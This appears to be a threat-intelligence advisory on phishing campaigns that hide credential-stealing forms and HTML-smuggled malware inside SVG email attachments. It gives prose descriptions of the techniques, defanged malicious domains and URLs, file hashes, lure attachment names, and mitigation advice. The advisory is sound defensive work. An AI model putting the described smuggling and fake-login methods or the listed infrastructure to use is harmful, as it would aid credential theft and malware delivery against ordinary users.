Malicious SVG Attachments Bypass Email Filters in Widespread Phishing Campaigns

Threat Group: Multiple cybercriminal organizations
Threat Type: Phishing, Malware Delivery
Exploited Vulnerabilities: Misuse of Scalable Vector Graphics (SVG) file capabilities
Malware Used: Agent Tesla Keylogger, XWorm Remote Access Trojan (RAT), QakBot
Threat Score: High (8.5/10) – Due to its ability to bypass traditional security measures, widespread distribution, and potential for significant data compromise.
Last Threat Observation: April 2, 2025
Overview
Scalable Vector Graphics (SVG) files, widely used for rendering two-dimensional web images, are being exploited as a novel phishing and malware delivery vector. Unlike static image formats like JPEG or PNG, SVGs are XML-based and capable of embedding scripts, making them ideal for evading traditional detection. Recent threat campaigns highlight a significant rise in malicious SVG attachments used to steal credentials and deliver malware.
SVG-based phishing schemes have seen a 245% increase from late 2024 to early 2025 according to KnowBe4 Threat Labs. The adoption of SVG attachments in campaigns indicates a shift in threat actor behavior as these files can easily bypass email filters and security gateways by posing as benign images.
Malware and Tactics
Cybercriminals are leveraging SVGs for multiple types of attacks:
- Credential Phishing: Attackers use SVGs that render counterfeit login forms using
<foreignObject>
tags, mimicking Microsoft 365, DocuSign, or SharePoint portals. The form captures login details and exfiltrates them via embedded JavaScript. - Malware Delivery: SVGs embed download links to malicious ZIP files or executables hosted on Dropbox, Bitbucket, or attacker-controlled domains. HTML smuggling techniques are frequently used, with malware payloads encoded as base64 blobs inside the SVG file itself.
- HTML Smuggling: Scripts inside SVGs decode and reconstruct malware payloads on the victim’s machine, evading traditional email and network-based filtering.
- Evasion Techniques: Attackers employ polymorphism, padding with benign text (e.g., Wikipedia articles), CAPTCHAs to evade scanners, and transparent overlays to trick users into clicking.
These campaigns exploit SVG's design for interactive web elements, such as clickable regions and embedded scripts. Attacks are becoming more advanced, often including user tracking, anti-sandbox code, and multi-domain redirection chains.
Attack Vectors
- Email Attachments: SVGs are disguised as legitimate documents (e.g., invoices or voicemails). The script activates upon opening, often launching a browser session to a phishing page or triggering malware downloads.
- Embedded Links in Emails: Links to SVG files hosted on legitimate cloud platforms appear trustworthy, but execute malicious JavaScript once opened.
- Click Traps: Blank or transparent SVG graphics contain active click areas leading to phishing websites or triggering downloads.
- CAPTCHA-Protected Phishing: Campaigns employ CAPTCHAs to filter automated scanners before presenting the phishing login form to real users.
Notable Campaigns
- Cofense (2023–2024): Identified use of AutoSmuggle to embed ZIP payloads in SVGs delivering Agent Tesla and XWorm. These attachments bypassed detection through polymorphic variation.
- Sophos X-Ops (2025): Reported phishing emails using SVGs that emulate Microsoft login pages with AiTM techniques and CAPTCHA bypasses.
- AhnLab (2024–2025): Tracked SVGs smuggling AsyncRAT using base64-encoded scripts and implementing anti-sandboxing logic to avoid analysis.
- KnowBe4 (March 2025): Recorded SVG attachments comprising 30% of all flagged malicious attachments in early March, including campaigns that targeted Office 365 credentials.
Indicators of Compromise (IoCs)
File Hashes:
- 42565c1c9ecedd937439713e20838b3a
- caad49bc4c408e6af8aea813cec6cb0b
Malicious Domains:
hxxp://oK2Nv4ZWX6.moydow[.]de
hxxps://[Account Domain].islaxw[.]es
URLs:
hxxp://oK2Nv4ZWX6.moydow[.]de/.../[Email Account]
hxxps://[Account Domain].islaxw[.]es/.../#[Email Account]
Attachment Names (Observed):
Play Voicemail Transcription.(387KB).svg
MT103_0296626389_.svg
DOC217_3052.svg
Access Document Remittance_RECEIPT762.svg
Behaviors:
- Unexpected downloads triggered by SVGs
- SVG-initiated connections to low-reputation or recently registered domains
- Use of base64 JavaScript strings in SVGs
- Redirection to phishing domains after CAPTCHA prompt
Mitigation and Recommendations
- Email Filtering: Block or quarantine emails with SVG attachments unless explicitly required. Use advanced attachment filtering and sandboxing to analyze content.
- Content Disarm and Reconstruction (CDR): Sanitize SVG attachments by converting them to static image formats (e.g., PNG) to remove scripts.
- User Awareness: Train staff on the risks of SVG attachments and phishing red flags, particularly around file types like
.svg
,.html
, and.htm
. - File Association Policies: Reconfigure workstations to open
.svg
files with Notepad or an offline image viewer to prevent execution in browsers. - EDR/AV Enhancements: Tune security tools to detect suspicious process activity launched from browser sessions initiated by SVG files.
- Web Filtering: Block access to known phishing and malware domains. Use DNS-based threat intelligence to catch newly registered or dynamic redirector domains.
- Threat Hunting: Monitor for known IoCs, anomalous SVG file downloads, and sudden browser activity tied to mail attachments.
- 2FA Enforcement: Mandate multi-factor authentication for all cloud and remote access systems.
Risk Summary
SVG-based attacks mark a return to file format abuse as attackers innovate around static defenses. These campaigns are growing in sophistication—leveraging multi-stage redirection, evasive phishing kits, and script-embedded payload delivery. Their success is tied to low user awareness and the general underestimation of SVG files as threat vectors. Organizations must adapt to treat SVGs as potentially dangerous content and build layered detection and response strategies accordingly.
Conclusion
The exploitation of SVG files for phishing and malware delivery is a stark reminder that threat actors continue to evolve by turning common web technologies into attack vectors. These attacks combine stealth, interactivity, and technical creativity, posing a serious challenge to email and endpoint security controls. The increasing adoption of SVG-based delivery methods across multiple malware families and phishing campaigns suggests this tactic is no longer niche—it is now mainstream within the cybercriminal arsenal.
Security teams must not underestimate the risk posed by seemingly harmless image files. Organizations should respond by incorporating SVG filtering into existing defenses, enhancing user education, and closely monitoring for suspicious activity triggered by unconventional file types. Threat intelligence sharing, updated detection rules, and proactive hunting are essential for staying ahead of this growing threat. As SVG-based attacks continue to evolve, defenders must remain vigilant and agile in their detection and response strategies.
Sources
- ASEC - SVG Phishing Malware Being Distributed with Analysis Obstruction Feature
- Cofense: SVG Smuggling: QakBot Campaign Uses New Delivery Technique
- Sophos X-Ops: Scalable Vector Graphics files pose a novel phishing threat
- KnowBe4: 245% Increase in SVG Files Used to Obfuscate Phishing Payloads
- BleepingComputer: Phishing Emails Increasingly Use SVG Attachments to Evade Detection